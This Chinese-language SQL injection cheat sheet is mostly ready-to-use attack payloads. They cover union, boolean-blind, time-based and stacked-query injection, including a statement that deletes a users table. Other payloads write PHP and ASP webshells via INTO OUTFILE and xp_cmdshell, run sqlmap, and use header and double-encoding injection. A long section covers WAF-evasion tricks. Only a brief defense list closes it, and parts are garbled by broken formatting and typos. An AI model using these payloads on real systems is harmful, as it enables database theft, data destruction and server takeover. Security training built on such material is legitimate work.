SQL注入原理
SQL注入原理
当客户端提交的数据未作处理或转义直接带入数据库,就造成了sql注入。
攻击者通过构造不同的sql语句来实现对数据库的任意操作。
SQL注入分类
按变量类型分:
- 数字型
- 字符型
按HTTP提交方式分:
- POST注入
- GIT注入
- Cookie注入
按注入方式分:
- 布尔注入
- 联合注入
- 多语句注入
- 报错注入
- 延时注入
- 内联注入
按数据库类型分:
- SQL:
- Oracle
- MySQL
- mssql
- access
- sqlite
- postgersqlnosql:
- mongodb
- redis
MySQL与MSSQL及ACCESS之间的区别
-
MYSQL5.0以下没有information_schema这个默认数据库。
-
ACCESS没有库名,只有表和字段,并且注入时,后面必须跟表名,ACCESS没有注释
举例:
select 1,2,3 from table_name union select 1,2,3 from table_name
-
.MySQL使用limit排序,ACCESS使用TOP排序(TOP在MSSQL也可使用)
-
判断三种数据库的语句:
MySQL:and length(user())>10
ACCESS:and (select count()from MSysAccessObjects)>0
MSSQL:and (select count()from sysobjects)>0
基本手工注入流程
-
判断注入点
- 数字型:
id=2-1
- 字符型:
’ 、’)、 '))、 "、 ")、 "))
- 注释符:
-- (这是–空格)、–+、/**/、#
- 这是一个较为全面的SQL注入总结
- 数字型:
-
获取字段数:
- order by 二分法联合查询字段数,观察页面变化从而确定字段数
- order by 1
- order by 50
- group by 译为分组,注入时也可使用
- order by 二分法联合查询字段数,观察页面变化从而确定字段数
-
查看显示位尝试使用联合注入
-
利用
and 1=2
或and 0
及id=-12
查看显示数据的位置 -
替换显示位改成SQL语句,查看信息(当前数据库,版本及用户名)
- 例如:
and 1=2 union select version(),2,3
- 例如:
-
再查询所有数据库
and 1=2 union select(select group_concat(schema_name)from information schema.schemata),2,3
-
查询所有的表名
union select(select group_concat(table_name)from information_schema.tables),2,3
-
查询所有的字段名
union select(select group_concat(column_name)from information_schema.columns),2,3
-
查询字段内容
-
布尔盲注
- 在布尔盲注中常用到的函数:
- char() 解ASCLL码;
- mid() 截取字符串;
- 举例: mid('hello',1,3),从第1位开始截取3位,输出位hel
- substr()与mid()相同,都为截取字符串;
- count() 计算查询结果的行数;
- concat() 查询结果并但保持原有行数;
- group_concat() 查询结果合并但都放在一行中;
- ascii() 查询ascii码;
- 猜数据库长度(利用二分法);
- id=1 and (length(database()))>1
- id=1 and (length(database()))>50
- 猜第一个字符,第二个字符,以此类推
- and ascii(mid(database(),1,1))>1
- and ascii(mid(database(),2,1))>1
- 查询当前数据库中所有表名;
and (select count(table_name)from information_schema.tables where tables_schema=database())>1and (select count(table_name)from information_schema.tables where tables_schema=database())>10
- 查询第一个表的长度;
and (select length(table_name)from information_schema.tables where tables_schema=database()limit 0,1)>10
- 查询表的第一个字符;
and ascii(mid((select table_name from information_schema.tables where table_schema=database()limit 0,1),1,1))>1
- 查询atelier表里有几个字段;
and(select count(column_name)from information_schema.columns where table_name = ‘atelier’ and table_schema = database())>2
- 查询第一个字段长度;
and length((select column_name from information_schema.columns where table_name=‘atelier’ and table_schema= database()limit 0,1))>1
- 查询字段第一个字符;
and ascii(mid((select column_name from information_schema.columns where table_schema = ‘db83231_asfaa’ and TABLE_NAME =‘atelier’ limit 0,1),1,1))>105
- 查询字段所有行数;
and (select count(*) from db83231_asfaa.atelier)>4
- 查询字段名的行数(查询emails表,uname字段);
and (select count(uname)from security.emails)>7 查询uname的行数
- 查询字段内容;
length((select username from security.users limit 0,1))>10ascii(mid((select username from security.user limit 0,1),1,1))>100
- 将查询到的ASCLL码放到mysql中查询。
- 在布尔盲注中常用到的函数:
-
延时盲注
- 利用sleep(时间)和if(1=2,1,0)及case进行延时注入,例:
- 这个是基本操作,如果是单引号闭合,执行睡眠时间3秒;
select * from user where id=‘1’ or sleep(3) %23
- 如果长度大于10,则睡3秒,其他则0秒;
select * from user where id= 1 and if(length(version())>10,sleep(3),0);
- case定义条件,when后面的1表示ture也代表真,当条件为真时,睡3秒,其他则0秒。
select * from user where id= 1 and case length(version())>10 when 1 then sleep(3) else 0 end;
- 这个是基本操作,如果是单引号闭合,执行睡眠时间3秒;
- 利用sleep(时间)和if(1=2,1,0)及case进行延时注入,例:
-
多语句注入
- 多语句意思就是可以执行多个语句,利用分号进行隔开;
- 例:
id=1";WAITFOR DELAY ‘0:0:3’;delete from users; --+id=1’;select if(length(user(),1,1)>1,sleep(3),1) %23’;select if(length((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)>1,sleep(3),1) %23
- 例:
- 多语句意思就是可以执行多个语句,利用分号进行隔开;
-
内联注入
-
举例:
id=-1 /!UNION/ /!SELECT/ 1,2,3
-
利用别名:
-
union select 1,2,3,4,a.id,b.id,* from(sys_admin as a inner join sys_admin as b on a.id=b.id) getshell id=-1’ union select 1,2,(select ‘<?php @eval($_POST[1]);?>’ into outfile ‘/var/www/html/404.php’) --+
-
-
也可以使用dumpfile进行写入。
-
outfile和dumpfile的区别:
- outfile适合导库,在行末尾会写入新行并转义,因此不能写入二进制可执行文件。
- dumpfile只能执行一行数据。
-
数据库写入:
-
exec master…xp_cmdshell ‘echo “<%eXECutegLobaL rEquEst(0)%>” > “c:\www\upload\Files\2019-11\404.asp”’
-
-
-
宽字节注入
- 当编码位gbk时,%df%27和%81%27数据位空。
- 宽字节注入检测方式;
- 就是说客户端发送的数据编码为gbk时,那么可能会吃掉转义字符\反斜杠,闭合之后页面恢复正常,存在宽字节注入。
- 测试出来就可以使用sqlmap跑了。
- 加构造注入点(比-p更稳定),让sqlmap对构造注入点进行注入攻击(优先级更高);
-
宽字节防御
- 第10行代码必须和第24行必须同时使用,要么就更换编码格式;
-
二次编码注入
-
代码中有urldecode()函数;
-
%2527 先解码成%27再解码成'单引号;
-
演示:
sqlmap -u http://192.168.100.141/index.php/author=123 --prefix “%2527” --suffix “%23”
-
-prefix为设置前缀 -suffix为设置后缀
-
设置后缀,防止sqlmap使用内联注入
-
设置后缀,防止sqlmap使用内联注入
-
-
-
图片上传sql注入
- 猜结构,为时间戳加文件名
-
-
二次注入
-
abc’ 数据经过addslashes过滤,单引号前面添加反斜杠abc’,但传到数据库的数据还是abc’
-
假如在如下场景中,我们浏览一些网站的时候,可以现在注册见页面注册username=test’,接下来访问xxx.php?username=test’,页面返回id=22;
-
接下来再次发起请求xxx.php?id=22,这时候就有可能发生sql注入,比如页面会返回MySQL的错误。
-
访问xxx.php?id=test’ union select 1,user(),3%23,获得新的id=40,得到user()的结果,利用这种注入方式会得到数据库中的值。
-
-
XFF头注入
-
update user set loat_loginip = ‘8.8.8.8’ where id =1 and sleep(5) #’ where username = ‘zs’; id根据网站用户量取一个中间值,测试是否有注入,利用插件设置XFF头,如果网站不报错,可尝试此注入;
-
X-Forward-For:127.0.0.1’ select 1,2,user()
-
User-Agent请求头注入
-
-
DNS外带日志示例
- 外带平台 :
xip.io ceye.io
- MSSQL查询当前数据库;
- 外带平台 :
-
常用过WAF技巧
-
特征字符大小写(基本没用)
-
UnIoN SeLcT 1,2,3
-
-
内联注释
-
id=-1/!UNION/%20//!SELECT/%201,2,3
-
-
特殊字符代替空格
-
%09 tab键(水平)、%0a 换行、%0c 新的一页%0d return功能、%0b tab键(垂直)、%a0空格
-
-
等价函数和逻辑符号
-
hex()、bin()>ascii()sleep()>benchmark()concat_ws()>group_concat()mid()、substr()>substring()@@version==>version()@@datadir==>datadir()逻辑符号:如and和or不能使用时,尝试&&和||双管道符。
-
-
特殊符号
-
反引号,select version(),绕过空格和正则加号和点,"+“和”."代表连接,也可绕过空格和关键字过滤@符号,用于定义变量,一个@代表用户变量,@@代表系统变量
-
-
关键字拆分
-
‘se’+‘lec’+‘t’%S%E%L%C%T 1,2,3?id=1;EXEC(‘ma’+‘ster…x’+‘p_cm’+‘dsh’+‘ell"net user"’)!和():'or–+2=–!!!'2id=1+(UnI)(oN)+(SeL)(EcT)
-
-
小括号
-
union (select+1,2,3+from+users)%23union(select(1),(2),(3)from(users))id=(1)or(0x50=0x50)id=(-1)union(((((((select(1),hex(2),hex(3)from(users))))))))
-
-
花括号
-
select{x user}from{x mysql.user}id=-1 union select 1,{x 2},3
-
-
过滤and和or下的盲注
-
id=strcmp(left((select%20username%20from%20users%20limit%200,1),1),0x42)%23id=strcmp(left((select+username+from+limit+0,1),1,0x42)%23
-
-
白名单绕过
-
拦截信息
-
GET /pen/news.php?id=1 union select user,password from mysql.user
-
绕过:
-
GET /pen/news. php/admin?id=1 union select user,password from mysql. userGET /pen/admin/…\news. php?id=1 union select user,password from mysql. user
-
-
-
-
HTTP参数控制
-
HPP(HTTP Parmeter Polution)(重复参数污染)
-
列:
index.php?id=1 union select username,password from usersindex.php?id=1/**/union/&id=/select/&id=/username.password/&id=/from/&id=/users HPP又称作重复参数污染,最简单的是?uid=1&uid=2&uid=3,对于这种情况,不用的web服务器处理方式不同。
-
具体WAF如何处理,要看设置的规则,不过示例中最后一个有较大可能绕过
-
-
HPF(HTTP Parmeter Fragment)(HTTP分割注入)
-
HTTP分割注入,同CRLF有相似之处(使用控制字符%0a、%0d等执行换行)
-
列:
/?a=1+union/&b=/select+1,pass/&c=/from+users–select * from table where a=1 union/* and b=/select 1,pass/ limit */from users—
-
-
-
SQL注入防御
- 对用户输入的内容进行转义;
- 限制关键字的输入,如单引号、双引号、右括号等,限制输入的长度;
- 使用SQL语句预处理,对SQL语句进行预编译,然后进行参数绑定,最后传入参数;
- 添加WAF,防火墙等。
-